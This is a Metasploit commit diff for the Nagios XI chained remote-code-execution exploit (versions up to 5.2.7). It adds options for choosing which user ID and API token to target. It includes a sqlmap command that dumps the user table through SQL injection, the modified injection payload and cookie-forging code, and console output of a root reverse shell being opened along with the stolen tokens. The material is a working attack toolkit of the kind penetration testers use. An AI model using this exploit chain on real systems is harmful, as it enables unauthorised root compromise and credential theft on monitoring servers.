Land rapid7#7427, new options for nagios_xi_chained_rce

wvu · wvu · commit 1d6ee7192adc · 2016-11-30T17:11:02.000-06:00
diff --git a/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md b/documentation/modules/exploit/linux/http/nagios_xi_chained_rce.md
@@ -28,8 +28,22 @@ steps on the screen to configure the app.
 Configuration is actually not required to exploit the app, but you should do it
 anyway.
 
+## Options
+
+  **USER_ID**
+
+  If you wish to exploit a particular ```USER_ID```, that can be specified here.  Default is 1, which is most likely the admin account.
+  
+  **API_TOKEN**
+  
+  The SQLi included only works for MySQL, which should work in most cases.  However, if you experience a different backend, you can enumerate the user
+  table via sqlmap: ```sqlmap -u "http://[ip]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump```.
+  Then you can set the ```USER_ID``` and ```API_TOKEN``` to skip those phases and move on to exploitation.  Default is empty.  See example below for more usage.
+
 ## Usage
 
+### Typical Usage
+
 Just set ```RHOST``` and fire off the module! It's pretty much painless.
 ```set VERBOSE true``` if you want to see details.
 
@@ -71,3 +85,103 @@ uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
 uname -a
 Linux localhost.localdomain 2.6.32-573.22.1.el6.x86_64 #1 SMP Wed Mar 23 03:35:39 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 ```
+
+### Emulating a different DB
+
+#### First we'll attempt the exploit and see what happens.
+
+```
+msf exploit(nagios_xi_chained_rce) > show options
+
+Module options (exploit/linux/http/nagios_xi_chained_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   API_TOKEN                   no        If an API token was already stolen, skip the SQLi
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST      192.168.2.218    yes       The target address
+   RPORT      80               yes       The target port
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   USER_ID    1                yes       User ID in the database to target
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.2.117    yes       The listen address
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nagios XI <= 5.2.7
+
+
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting API token
+[+] 0 incidents resolved in Nagios IM
+
+[-] Exploit aborted due to failure: unexpected-reply: API token not found! punt!
+[*] Exploit completed, but no session was created.
+```
+
+#### Now lets try using sqlmap to enumerate the user table.
+
+```
+root@k:~# sqlmap -u "http://192.168.2.218/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=resolve&host=a&service=" -p service -T xi_users --dump
+...snip...
+Database: nagiosxi
+Table: xi_users
+[2 entries]
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| user_id | name                 | email             | enabled | username    | password                         | backend_ticket                                                   |
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+| 2       | admin2               | admin2@admin2.com | 1       | admin2      | c84258e9c39059a89ab77d846ddab909 | 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g |
++---------+----------------------+-------------------+---------+-------------+----------------------------------+------------------------------------------------------------------+
+
+...snip...
+```
+
+#### Re-target
+Now, we can set the ```USER_ID``` and ```API_TOKEN``` (backend_ticket)
+
+```
+msf exploit(nagios_xi_chained_rce) > set USER_ID 2
+USER_ID => 2
+msf exploit(nagios_xi_chained_rce) > set API_TOKEN 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+API_TOKEN => 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
+msf exploit(nagios_xi_chained_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Nagios XI version: 5.2.7
+[*] Getting admin cookie
+[+] Admin cookie: nagiosxi=rjs4f9k4299v78hpgq3374q6j6;
+[+] CSRF token: c53d1f591264a3ea771639a7782627f8
+[*] Getting monitored host
+[+] Monitored host: localhost
+[*] Downloading component
+[*] Uploading root shell
+[*] Popping shell!
+[*] Command shell session 2 opened (192.168.2.117:4444 -> 192.168.2.218:51032) at 2016-10-10 10:15:08 -0400
+[*] Cleaning up...
+[*] rm -rf ../profile
+[*] unzip -qd .. ../../../../tmp/component-profile.zip
+[*] chown -R nagios:nagios ../profile
+[*] rm -f ../../../../tmp/component-ZEaGkiTW.zip
+
+1138255764
+NXEqynCVIfLzvpjUkqOovFvuLgsUrtpo
+CKorOSWlTQEkRoiwCiBqTgylyLQjuWxU
+oIGZxLofAStLsgsMNaGnQzzMuBYpJUQs
+fkUlWzVvhurgAATtxKhLSBFCxQaZqjtR
+QajRDDToeigHGMFdUbaClxkLfJbxqBKv
+whoami
+root
+```
diff --git a/modules/exploits/linux/http/nagios_xi_chained_rce.rb b/modules/exploits/linux/http/nagios_xi_chained_rce.rb
@@ -44,6 +44,11 @@ def initialize(info = {})
         'LHOST'         => Rex::Socket.source_address
       }
     ))
+
+    register_options([
+      OptInt.new('USER_ID',      [true, 'User ID in the database to target', 1]),
+      OptString.new('API_TOKEN', [false, 'If an API token was already stolen, skip the SQLi'])
+    ])
   end
 
   def check
@@ -69,8 +74,12 @@ def exploit
       fail_with(Failure::NotVulnerable, 'Vulnerable version not found! punt!')
     end
 
-    print_status('Getting API token')
-    get_api_token
+    if datastore['API_TOKEN']
+      @api_token = datastore['API_TOKEN']
+    else
+      print_status('Getting API token')
+      get_api_token
+    end
     print_status('Getting admin cookie')
     get_admin_cookie
     print_status('Getting monitored host')
@@ -117,13 +126,19 @@ def get_api_token
       'vars_get' => {
         'mode'   => 'resolve',
         'host'   => '\'AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((' \
-                    'SELECT backend_ticket FROM xi_users WHERE user_id=1' \
+                    "SELECT backend_ticket FROM xi_users WHERE user_id=#{datastore['USER_ID']}" \
                     '),FLOOR(RAND(0)*2))x ' \
                     'FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- '
       }
     )
 
+    # default admin token is shorter, ie 27o3b7mu1 shortened to 27o3b7mu
+    # any other user has a longer token, but we cant strip the last char off.
+    # example: 8ftgcj2jubs8nrjnlga0ssakeen4ij8p339cl8shgom7kau7n86j3d6grsidgp6g
     if res && res.body =~ /Duplicate entry '(.*?).'/
+      if $1.length > 8
+        res.body =~ /Duplicate entry '(.*?)'/
+      end
       @api_token = $1
       vprint_good("API token: #{@api_token}")
     else
@@ -136,7 +151,7 @@ def get_admin_cookie
       'method'   => 'GET',
       'uri'      => '/nagiosxi/rr.php',
       'vars_get' => {
-        'uid'    => "1-#{Rex::Text.rand_text_alpha(8)}-" +
+        'uid'    => "#{datastore['USER_ID']}-#{Rex::Text.rand_text_alpha(8)}-" +
                     Digest::MD5.hexdigest(@api_token)
       }
     )
